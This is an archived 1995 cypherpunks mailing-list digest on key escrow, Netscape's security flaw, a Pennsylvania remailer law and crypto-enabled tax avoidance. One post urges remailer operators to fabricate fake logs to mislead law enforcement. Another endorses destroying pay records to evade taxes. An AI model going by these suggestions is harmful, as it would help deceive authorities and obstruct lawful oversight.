Date: Sun, 15 Oct 95 16:18:55 PDT
To: John Young <jya@pipeline.com>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510152256.SAA02632@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.951015191716.20081A@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, John Young wrote:

>    All praise to Jeff and his fellow programmers for sharing
>    the struggle to come up with stronger cypto, but, no praise
>    at all to Netscape's front office guys bullshitting the
>    stock holders and speculators. Check the press releases and
>    the speeches to customers and investors.

I think it will be interesting to see if Netscape will ever sell enough 
product to make a profit...however, they seem to be an excellent charity 
so far, making the WWW a very popular place.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 15 Oct 95 19:33:27 PDT
To: cypherpunks@toad.com
Subject: Re: PA Remailer Concerns
In-Reply-To: <199510160213.WAA07796@thor.cs.umass.edu>
Message-ID: <199510160228.TAA17962@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I've sent mail to John Gilmore asking him if the EFF might
want to take part in suing the state over this thing. We'll see, I
guess.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@replay.com (Nobody in particular)
Date: Sun, 15 Oct 95 19:31:47 PDT
To: hackmsoft@c2.org
Subject: Illegally canceled articles on Microsoft Security Bugs
In-Reply-To: <llurch-1510951157410001@tip-mp3-ncs-3.stanford.edu>
Message-ID: <199510160231.TAA10813@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


(A copy of this message has also been posted to the following newsgroups:
alt.security,
comp.os.ms-windows.apps.misc,comp.os.ms-windows.win95.misc,alt.religion.scientology,news.admin.net-abuse.misc,comp.protocols.smb,comp.os.ms-windows.advicacy,comp.os.ms-windows.networking.tcp-ip)

-----BEGIN PGP SIGNED MESSAGE-----

Could somebody please tell me who illegally canceled my article
<llurch-1510951157410001@tip-mp3-ncs-3.stanford.edu>, referenced
in the followup article below, as well as several other articles
I posted this morning? It was cross-posted to several groups, but
I don't think it should have triggered any spam-cancelers, and
I see nothing in news.admin.net-abuse.misc. I'd find the cuplrit
myself, but Stanford only saves the last 100 or so messages in
control. See the rather prominent blinking link on the Web page
below for the other PGP-signed article that was canceled.

Thanks in advance. Followups set to news.admin.net-abuse.misc.

Don't bother canceling this article, my friend. By the way, the
other articles were saved and emailed as well.

- -rich
 jabba@deathstar.stanford.edu and other accounts
 moderator of a certain list
 http://rescomp.stanford.edu/~llurch/innocuous/faq.html
 PGP key available on MIT server and via finger

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIHC9oND7LjhcPQ9AQHTZgQAxGQZGTFDrzUTfyWCuLTUP2VbIp6IwK/Y
NJjy7ke4rgZH+bjegb1h2ig/lALEhnX4+uhurhDJ0wq6du2p5V/DUlsNHCcWvotL
GHyd/ZLzXGq6OYRoPijUHAdDBPD2wWIdAfsYNiTgv3iezBJL+2cCq/YLiPd22KyF
MROQwF05Hoc=
=1K2B
-----END PGP SIGNATURE-----

I will be charitable and assume that it was someone else I've pissed off
(lord knows there's several), and not someone working directly for
Microsoft or the Church [spit] of Scientology, who were both maligned in
the canceled posts.

In article <petrichDGID4I.5GG@netcom.com>, petrich@netcom.com (Loren
Petrich) wrote:
> Newsgroups:
> alt.security,comp.os.ms-windows.apps.misc,comp.os.ms-windows.win95.misc
> Path:
>
nntp.Stanford.EDU!news.Stanford.EDU!agate!howland.reston.ans.net!newsfeed.internetmci.com!news.sprintlink.net!noc.netcom.net!netcom.com!petrich
> From: petrich@netcom.com (Loren Petrich)
> Subject: Re: More Microsoft Security Bugs
> Message-ID: <petrichDGID4I.5GG@netcom.com>
> Organization: NETCOM On-line Communication Services (408 261-4700 guest)
> References: <llurch-1510951157410001@tip-mp3-ncs-3.stanford.edu>
> Date: Sun, 15 Oct 1995 21:02:42 GMT
> X-Original-Newsgroups:
>
comp.os.ms-windows.win95.misc,alt.security,comp.os.ms-windows.apps.financial,comp.os.ms-windows.apps.utilities,comp.os.ms-windows.apps.word-proc,comp.os.ms-windows.apps.misc,alt.fan.bill-gates,comp.os.ms-windows.advocacy,alt.destroy.microsoft,comp.os.ms-windows.nt.admin.misc
> Lines: 9
> Sender: petrich@netcom2.netcom.com
> Xref: nntp.Stanford.EDU alt.security:21764
> comp.os.ms-windows.apps.misc:13757 comp.os.ms-windows.win95.misc:38436
>         My favorite example of such a bug is in BOB's password protection.
> If you mistype it 3 times, it will ask if you want another one. The only
> defender of this "feature" has been -- get this -- JoanieDearest (at 
> least if memory serves me correctly).
> -- 
> Loren Petrich                           Happiness is a fast Macintosh
> petrich@netcom.com                      And a fast train
> Visit my ftp site; its address is (in WWW syntax):
> ftp://ftp.netcom.com/pub/pe/petrich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 15 Oct 95 19:15:49 PDT
To: cypherpunks@toad.com
Subject: Re: My chat with  Goeff Greiveldinger
Message-ID: <aca70b991b0210041885@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:00 PM 10/15/95, Michael Froomkin wrote:
>I will be appearing with  Goeff Greiveldinger, he of the Justice Dept, at
>a discussion of commercial key escrow next Thursday in Bethesda.  Anyone
>with fun questions I should throw at him should contact me...
>
>Please note that the ostensible topic of this discussion is *commerical*
>key escrow, not Clipper per se, so I have to be diplomatic....

The question I have is this: Why is the Justice Department even involved at
all if it is truly only about _commercial_ key escrow?

(I have some speculations, of course, which I'll share in a minute.)

While commercial key escrow of course has legal implications, so do a lot
of things that I suspect the Justice Department has no interest in
discussing with anyone. And most of the implications of commercial key
escrow--if strongly voluntary in the sense we have discussed many times
here--are implications of _contract_ law that will get hashed out through
court cases.

So, why is the JD interested? Why would Mr. Greiveldinger of the JD be at a
discussion of commercial key escrow if in fact it is to be purely voluntary
and strongly voluntary?

Unless, of course, the JD has interests that go beyond mere privately
arranged contracts to hold keys in safety.

Or, I suppose, export control issues. (But then I think it unlikely that a
strongly voluntary system would be allowed to be exported. And since a
domestic version that is strongly voluntary would leak out almost
immediately, I think a domestic strongly voluntary CKE system is unlikely.)

I suspect Michael Froomkin can tell us why the JD is involved, what the
stated reason is, but I still find it "odd" that a purely voluntary
contractual arrangement between, say, "Thomas Paine" and "Ye Olde Keye
Repository" is generating interest by King George's legal officers.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 15 Oct 95 16:37:30 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.951015141533.18407A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.951015191827.6604A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Black Unicorn wrote:

> Were I an overseas employer, I would be quite happy to work in a 
> "disinterested" jurisdiction and hire American workers to telecommute and 
> issue their pay blindly to the number only or crypto bank account of their 
> choice and promptly encrypt or lose the records.

Thanks for responding, Black (if I may call you Black), it means I don't 
have to.  

> Remember, there is an incentive for employERS as well as employees to 
> flee the tax system of a nation that is manipulative of it.  Employers 

Also an incentive for jurisdictions to engage in a beneficial "Dutch 
Auction" in which they offer lower and lower tax rates to attract 
employers and employees.

> Who are you going to work for?  The publisher who is based in New York 
> and reports all payments, or the publisher who works in the Cayman 
> Islands, reports nothing, and merely sells the manuscript to the big name 
> publisher in New York after purchasing it blind from you?

And as the intellectual components of goods and services are increasingly 
unbundled from the physical for efficiency reasons (greater range of 
competitors made possible) more work can be done at a distance.  

> When this is true, the most profitable venture in the United States will 
> be retail smuggling.  And as taxes are raised again and again, compliance 

Fairly easy these days with drop shipping of goods by third parties and 
the bypassing of retail distribution chains for more and more goods.

In any case, if goods end up being a smaller portion of Gross World 
Product, taxes on them become less significant.  The existence of 
taxation of physical goods certainly tips things in favor of the untaxed 
non physical goods and services.

Note that agriculture once made up 95% or more of GWP.  It doesn't any 
more.  Non physical goods like entertainment, financial services, etc can 
grow to dominate the world economy because they adapt well to cheap 
distribution over the nets.

In the Progress and Freedom Foundation's Friction Free Capitalism, taxes 
are a big part of the "friction" that is disintermediated.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Sun, 15 Oct 95 16:48:39 PDT
To: cypherpunks@toad.com
Subject: Re: I am looking for a way to create a zombie process
In-Reply-To: <9510151556.AA26716@all.net>
Message-ID: <45s6kc$t5r@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <m0t4X3e-000DgnC@yage.tembel.org>,
Michael Shields <shields@tembel.org> wrote:
>> Is there anyone who can give me a simple program or set of commands that
>> creates a zombie process? Thanks in advance. 
>
>Here, public domain.
>
<snip>
>	wait();
<snip>

wait(NULL); would be saner.

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sun, 15 Oct 95 19:57:17 PDT
To: cypherpunks@toad.com
Subject: Why commercial key escrow? [Re: My chat with Goeff Greiveldinger]
In-Reply-To: <aca70b991b0210041885@[205.199.118.202]>
Message-ID: <199510160257.TAA23550@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> tcmay@got.net (Timothy C. May) writes:
> The question I have is this: Why is the Justice Department even involved at
> all if it is truly only about _commercial_ key escrow?

DoJ is involved because industry didn't buy into Clipper-type GAK, and the
FBI still wants to be able to read encrypted files, as well as encrypted
phone conversations if they ever turn up.  The White House is willing to
help, but not to the extent of making GAK mandatory.  However, they (WH
and FBI) are hopeful that forcing either GAK or weak encryption on the
export market will encourage companies to build single systems that they
can both export and sell domestically, which would make the domestic ones
weak or GAKed as well.  DoJ is involved with the commercial escrow because
they (or NIST or somebody) expect to be certifying the export escrow
companies, which they hope will be the same operations.  As a data point,
Dorothy Denning is increasingly pessimistic that this plan will in fact
result in the same weak or escrowed system being used domestically; if it
doesn't, that presumably triggers Louis Freeh to head back to the Hill for
more legislation.

I don't know what they intend to do about PGP-like systems, but I suspect
that's a second-order concern; the first-order concern must be avoiding
the situation where Microsoft builds unGAKed 3DES into Word.

	Jim Gillogly
	Trewesday, 25 Winterfilth S.R. 1995, 02:51





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 15 Oct 95 19:48:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PA Remailer Concerns
Message-ID: <aca715081d0210044fe2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:13 AM 10/16/95, Futplex wrote:

>I would very much like to see this law tested. I think it could prove fairly
>important to attack it with a well-planned, benign test case rather than wait
>for the next National Liberation spam or a death threat.
>
>I don't live in PA, but I would be willing to participate as the defendant in
>a test case under the right circumstances. Presumably I would open an
>account with an ISP in Penna., set up a remailer on the account (need to find
>an ISP that clearly allows that), and have somebody send a message through it.
>
>We would need to design a promising test case and find an attorney willing &
>able to offer pro bono services.

I'm not a lawyer, though I hang out on the "Cyberia" list and I watched a
lot of the OJ trial. :-}

Seriously, it is hard to "design a promising test case" in this way.
They--the Pennsylvania law enforcement authorities--don't have to take the
bait. They can just do nothing, until an incident arises which provokes
them. Maybe next year, maybe five years from now. Such an incident is
likely to be one that they figure will make for a popular prosecution. One
of the Four Horseman, probably.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 15 Oct 95 17:28:39 PDT
To: perry@piermont.com
Subject: Re: what are these people selling????
Message-ID: <9510160025.AA08409@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Jim Bidzos and some of us might have interesting interactions on
>patent issues, but I've got to emphasize that he's no demon. He's a
>guy trying to make a buck on his patent properties -- by and large he
>has the same interests about seeing cryptography spread that the rest
>of us do.

Only until the patents expire.  He's no demon, but there's no altruism at
work.  Come the millenium he moves to things like selling cars.

You heard it here first.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 15 Oct 95 21:14:44 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510160413.VAA28410@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Derek Atkins wrote:

> >         Why would a compony like Netscape jeapordise themselves by
> > even letting out a beta version so hackers have time to find bugs
> > before the full version is released. Don't take me wrong I have only
> > been on the net fer a little over a year and Love Netscape.  And If I
> > knew what I was Doing I would love to help them.....
>
> I don't think that this can jeopardize a company...

I agree.  I don't think it can jeopardize the company either.  After all,
we're talking about a company that has a market capitalization of more
than TWO BILLION US DOLLARS.  Two Billion Dollars can buy a lot of talent. 

Even if Netscape has to spend $100 Million on this problem, that sum
represents only 5% of Netscape's total market capitalization. 

I'm certain that Netscape has established a crisis control centre which is
manned and readied.  That a proper spin control program has been
implemented, and that a reasonable firm like Skadden Arps has been
retained. 

And I'm confident, that Netscape is drawing not only on its own resources
but that it's drawing on those who share Netscape's interests. 

Even if Skadden doesn't let you past security without a seven figure
retainer, I'm sure that if one of those nice boys from Morgan Stanley, ...
someone with snazzy Princeton ties ... maybe one of the ones who
orchestrated the Netscape IPO calls over to Skadden, Arps, Slate, Meagher
& Flom, I'm sure that one of those fellows will have their call returned
by any partner at Skadden. 

They're professional that way.

> What would you
> rather see?  A company makes a beta release for people to attempt to
> break, fixes the bugs, and then releases a better product?  Or would
> you rather see a company release a product, tell people it is secure,
> and then get bitten by numerous holes in it?

Well, I'm not sure that I'd want to make any representations or imply any
warranties whatsoever. 

> From a PR perspective, it sounds much better to take the first tact.
> Similarly, you will get a better product using the first method.
> Using the second method, NOT beta-testing your product, has a greater
> chance of jeopardizing a company.  At least if they put out a beta, if
> the press calls, they can say "this is nor our final product -- we
> wanted to let people give it a try and find problems, so that we can
> fix them before we start shipping".

We aren't just talking about a pre-alpha (Netscape beta) product.

We are speaking of something else here.  We're talking not only about a
problem in their NEW code, we're talking about a very big problem in the
middle of their EXISTING code.  A huge security hole in the code that
everyone is and has been running -- from 850,000 Deutsche Telecom
customers, throughout AT&T's internal organization and throughout their
worldwide customers, and god only knows how many individuals in the United
States and abroad.

This is an extremely serious software design issue.  It is equivalent
to designing and then building a house and forgetting to include any
plumbing, and no one really noticing, and no one really saying anything 
about it.

And when someone like Joan Rigdon calls from the Wall Street Journal, I 
hope that Netscape doesn't try to snow her.

She's been up and down the street ... and probably knows all about snow.


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 15 Oct 95 19:32:27 PDT
To: cypherpunks@toad.com
Subject: Next EFF-Austin General Meeting : Cryptography (fwd)
Message-ID: <199510160233.VAA01932@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
From bladex@bga.com Sun Oct 15 14:49:25 1995
Date: Sun, 15 Oct 1995 14:48:36 -0500 (CDT)
From: David Smith <bladex@bga.com>
Subject: Next EFF-Austin General Meeting : Cryptography
To: eff-austin@zilker.net
cc: austin-cpunks@einstein.ssz.com
Message-ID: <Pine.3.89.9510151441.A25318-0100000@urchin.bga.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII


                              Cryptography
         The Language Our Government Doesn't Want You to Learn

                       EFF-Austin General Meeting
                 Monday, October 16th, 7:00 to 9:00 p.m.
                   La Madelein Inn, 3418 North Lamar

The rights of individuals to live freely in a democracy versus the
powers society grants law enforcement to fight crime is one of the
longest running and one of the most contested debates in American
history.

Cryptography -- the ability to communicate in an encoded language -- is
merely the latest incarnation. This general meeting is designed to
provide an overview of the issues as well as an update on current events
of the last six months.

Areas of discussion include

        -- what is being called the "CLIPPER II" proposal -- the Clinton
        administration is willing to ease export restrictions on high
        strength cryptographic algorithms if an escrow decryption key is
        available where law enforcement officials have access to it.
        Speaker : David Smith, President EFF-Austin

        -- the recent cracking of a Netscape cryptography algorithm
        advertised as "secured" and it's implications for the
        development of electronic commerce on the Internet. One function
        of cryptography is that it provides a unique identifier. If you
        can't be reasonably sure that the person at the other end of the
        connection is who you think it is, just how much money are you
        will to risk in an electronic transaction?
        Speaker : Brian Combs, President Austin World Wide Web Users
        Group; Austin Web Publishing; and Board member, EFF-Austin.
        
        -- Pretty Good Privacy.  What is PGP, how does it work, who is
        Phil Zimmerman, and what is the legal status of all of this?
        Copies of PGP will be made available, as well as laptops to use
        for generating keys and keyrings.
        Speaker : Jim McCoy, Austin Cypherpunks.

Other topics are sure to be discussed; this is just a starting point for
discussion.
           
EFF-Austin is a local grass roots organization created to protect civil
liberties in cyberspace.  We provide educational forums on the social,
legal, and political consequences of cyberspace.

For further information, contact EFF-Austin President David Smith via
e-mail (bladex@bga.com).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 15 Oct 95 21:36:32 PDT
To: cypherpunks@toad.com
Subject: "Corporatocracy"
Message-ID: <aca72c2c1f021004bf81@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:42 AM 10/16/95, Michael Froomkin wrote:
>Those seeking more info on the conference will find it at:
>Http://www.multicorp.com/wec.
>
>They are asking over $500 in registration fees, which strikes me as wildly
>excessive, so I'm not advocating attendence.


Excessive registration costs for conferences have long bothered me, as
Michael knows first-hand.

I just declined to go to the Hacker's Conference this year because the
registration has risen to $400 for 2 days. That they supply a midnight
buffet is hardly justification for charging $200 a day, in my opinion. (My
direct comparison is to science fiction conventions, where the hotel rooms
run $70 a day and overall registration--with a nice program book!--is $40
or less.)

Doug Barnes informed me that the money laundering conference, for which he
wrote those great trip reports, cost $1000 for two days (gulp!). His
corporation picked up the tab, natch.

It's pretty clear to me that things are getting out of hand. I find myself
priced out of most conferences, not because I can't "afford" them, but
because I find paying $400 or $600 or more for a short conference to be a
poor use of my money, compared to other things (like mortgage payments,
books, investments, new doodads for my computer, toys, vacations, etc.).

Conferences seem to be priced to take advantage of the tax laws and to soak
corporations, which can write off the conferences. (No, I find there is no
way I can "write off" the various conferences I'd like to attend.)

Needless to say, I'm not saying conference organizers don't have the
"right" to charge these exorbitant fees. Clearly they find customers. But
it's also my right to avoid these "conference taxes."

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 15 Oct 95 19:13:48 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PA Remailer Concerns
In-Reply-To: <199510152238.AA43670@junkers.lochard.com.au>
Message-ID: <199510160213.WAA07796@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[I'm sending this to the cypherpunks and remailer-operators lists. Replies
are directed to c'punks, just to avoid crossposting followups, but I read
both lists. -Futplex]

Mark writes:
[re: a new Pennsylvania law]
> More likely the law will be used when a remailer operator wont play ball with
> the local LEA and surrender any existing logs. Then the LEA can simply throw
> the operator into a court under this legislation.
> 
> If (when?) something serious is perpetrated and planned using a remailer then
> they will have the motivation to shut them down.

I would very much like to see this law tested. I think it could prove fairly
important to attack it with a well-planned, benign test case rather than wait
for the next National Liberation spam or a death threat. 

I don't live in PA, but I would be willing to participate as the defendant in
a test case under the right circumstances. Presumably I would open an
account with an ISP in Penna., set up a remailer on the account (need to find
an ISP that clearly allows that), and have somebody send a message through it.

We would need to design a promising test case and find an attorney willing &
able to offer pro bono services. 

Any comments or suggestions, esp. from legal types (who of course are not
offering formal legal advice to anyone :) ?  Is this realistic ?  What would
it take to elicit a prosecution for such a test case ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 15 Oct 95 19:16:24 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <Pine.3.89.9510151747.D61174-0100000@aix2.uottawa.ca>
Message-ID: <Pine.SUN.3.91.951015221121.29505A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995 s1018954@aix2.uottawa.ca wrote:
 
 
> On Sun, 15 Oct 1995, Black Unicorn wrote:
> 
> > Effectively the potential for misuse is increased by virtue of the 
> > increased numbers of officals (commercial and public) who have access to 
> > the material.
> 
> Does he mean mandatory commercial key escrow (as in clipper keys held
> by credit agencies?) Or something totally voluntary but standardized
> by the gov? 

The problem exists in both these examples.

>  
> Of course it all depends on exactly why they really want the escrow anyway.
> If people will encrypt a second time with tomorrow's pgp, why should anyone
> care? 

When you see a glaring hole in argument for a government program, you 
should smell the stench of fish in the air.  That is the section of the 
puzzle that is being hidden until a politically "ripe" time to stick it 
in place.  Here that piece is, obviously, banning tomorrow's pgp.

> 
> All you'd single encrypt for would be your income tax and the 
> financial records you're already required by law to keep (I'm sure I've
> misunderstood this. Can't be so useless.). I know that's not a particularily
> diplomatic carry-over from the debated-to-death clipper thing, but really,
> except as PR, why DO they still take this seriously? (unless you want to 
> be paranoid about a ban, hmm, nevermind, debated-to-death)

I'm not so sure it's paranoid.  You have trial baloons floating all 
over.  Freeh is a prime example, and no one is screaming loudly enough to 
shoot down his blump.  That's a big'ole green light for regulators.> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <MAILER-DAEMON@usmc.mil>
Date: Sun, 15 Oct 95 19:23:16 PDT
To: <cypherpunks@toad.com>
Subject: Undeliverable Message
Message-ID: <vines.TnY7+96QUka@alairmd1.ala.usmc.mil>
MIME-Version: 1.0
Content-Type: text/plain


To:            <cypherpunks@toad.com>
Cc:            <remailer-operators@c2.org>
Subject:       Re: PA Remailer Concerns

Message not delivered to recipients below.  Press F1 for help with VNM
error codes.               

	VNM3043:  CPL JASON P JONES@IRM711@MCLB Albany


VNM3043 -- MAILBOX IS FULL.

   The message cannot be delivered because the
   recipient's mailbox contains the maximum number of 
   messages, as set by the system administrator.  The
   recipient must delete some messages before any
   other messages can be delivered.
   
   The default limit is 1000 messages.  Administrators 
   can set lower limits if required using the Change
   mailbox settings function available in the Manage
   User menu (MUSER).  The 1000 message limit is the
   maximum allowed by the Mail program.  If this limit
   is reached, the recipient must delete some of
   the messages before the mailbox can accept any more
   incoming messages.

----------------------  Original Message Follows  ----------------------[I'm sending this to the cypherpunks and remailer-operators lists. Replies
are directed to c'punks, just to avoid crossposting followups, but I read
both lists. -Futplex]

Mark writes:
[re: a new Pennsylvania law]
> More likely the law will be used when a remailer operator wont play ball with
> the local LEA and surrender any existing logs. Then the LEA can simply throw
> the operator into a court under this legislation.
> 
> If (when?) something serious is perpetrated and planned using a remailer then
> they will have the motivation to shut them down.

I would very much like to see this law tested. I think it could prove fairly
important to attack it with a well-planned, benign test case rather than wait
for the next National Liberation spam or a death threat. 

I don't live in PA, but I would be willing to participate as the defendant in
a test case under the right circumstances. Presumably I would open an
account with an ISP in Penna., set up a remailer on the account (need to find
an ISP that clearly allows that), and have somebody send a message through it.

We would need to design a promising test case and find an attorney willing &
able to offer pro bono services. 

Any comments or suggestions, esp. from legal types (who of course are not
offering formal legal advice to anyone :) ?  Is this realistic ?  What would
it take to elicit a prosecution for such a test case ?

-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 19:32:40 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: PA Remailer Concerns (and one very stupid joke)
In-Reply-To: <199510152238.AA43670@junkers.lochard.com.au>
Message-ID: <Pine.3.89.9510152144.D11124-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 16 Oct 1995, Mark wrote:

> More likely the law will be used when a remailer operator wont play ball with
> the local LEA and surrender any existing logs. Then the LEA can simply throw
> the operator into a court under this legislation.

Make fake logs. A random log generator with the e-mail addresses of the 
country's state, municipal and federal legislators, schoolchildren and a 
random sampling of the (*!ahem!*) tamer usenet groups would make for an 
excellent seed file. 

I really don't see there being very much enforcement following an initial case.

It would do wonders for Nobody, an12345 and Tommy de Tourist's (as Tim's sig 
puts it) reputations, wouldn't you say?

> The above opinions are rumoured to be my own. 
You aren't sure either, eh?

On the banque des cypherpunks front, I recently pinged cthulhu.com as a joke.
It worked. One wonders if the offshore and underwater Ryleh inc. is 
passing itself off as a PPP account as it prepares to resurface. They're
just waiting for a sign. I know who my banker's gonna be. Somehow I don't
think US jurisdiction extends just that far. Takes care of black 
securities & banking probs too. Who'd dare to cross the big boss?

(looking forward to anonymous, untraceable, digital ftagn$)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 15 Oct 95 19:26:26 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.951015191827.6604A-100000@panix.com>
Message-ID: <Pine.SUN.3.91.951015221647.29505B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Duncan Frissell wrote:

> 
> 
> On Sun, 15 Oct 1995, Black Unicorn wrote:
> 
> > Were I an overseas employer, I would be quite happy to work in a 
> > "disinterested" jurisdiction and hire American workers to telecommute and 
> > issue their pay blindly to the number only or crypto bank account of their 
> > choice and promptly encrypt or lose the records.
> 
> Thanks for responding, Black (if I may call you Black), it means I don't 
> have to.

'uni' sounds a lot less charged, but it doesn't matter much to me.
My pleasure.
 
> > Remember, there is an incentive for employERS as well as employees to 
> > flee the tax system of a nation that is manipulative of it.  Employers 
> 
> Also an incentive for jurisdictions to engage in a beneficial "Dutch 
> Auction" in which they offer lower and lower tax rates to attract 
> employers and employees.

"Race to the bottom" this is usually called by statists who dislike the 
effect.  It's also applied to things like environmental regulation, 
where (for example) many businesses in Illinois moved to Indiana when it 
became clear that Indiana was much more corporate friendly because their 
'office paper' disposal "tax" was zero, and Illinois was significant 
enough to make small business feel the pressure.  (No, I'm not kidding)  
Of course, losing the business, Illinois uped the ante and eliminated 
the tax all together and coupled it with some kind of incentive.  
Indiana countered and so forth.  Everyone won, of course, in that the 
total number of small businesses in both states outgrew economic growth over 
the period, but the leftists had a fit.  Wealth maximization is not a 
concept that is easily understoof by greedy statists who want MORE and 
want it NOW.  I am amused that this strata of market forces is 
never recognized as market forces, but just dirty nasty states shooting 
important regulation down.


> DCF


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 15 Oct 95 19:39:19 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <aca70b991b0210041885@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951015223314.5441B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May asks why Greiveldinger is invited (or, more to the point, why he 
accepted the invitation).

I don't know.  There are fun legal issues, not all arising from contract 
here.  In particular, assume for a momement that (1) the goverment offers 
"escrow" services and/or (2) the government requires that >40 bit 
encryption products include mandatory US govt-apporved escrow as a 
precondition for export clearance [the NIST trial balloon].

Under (1) your participation in the escrow is not necessarily 
"voluntary"; a similar, if less powerful, argument can be made under 
(2).  Also, when the government provides the "escrow service" different 
liability rules may apply.

FWIW, My guess is GG is going because the right person asked him.  That's 
why I'm going, and that's how Washington works...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
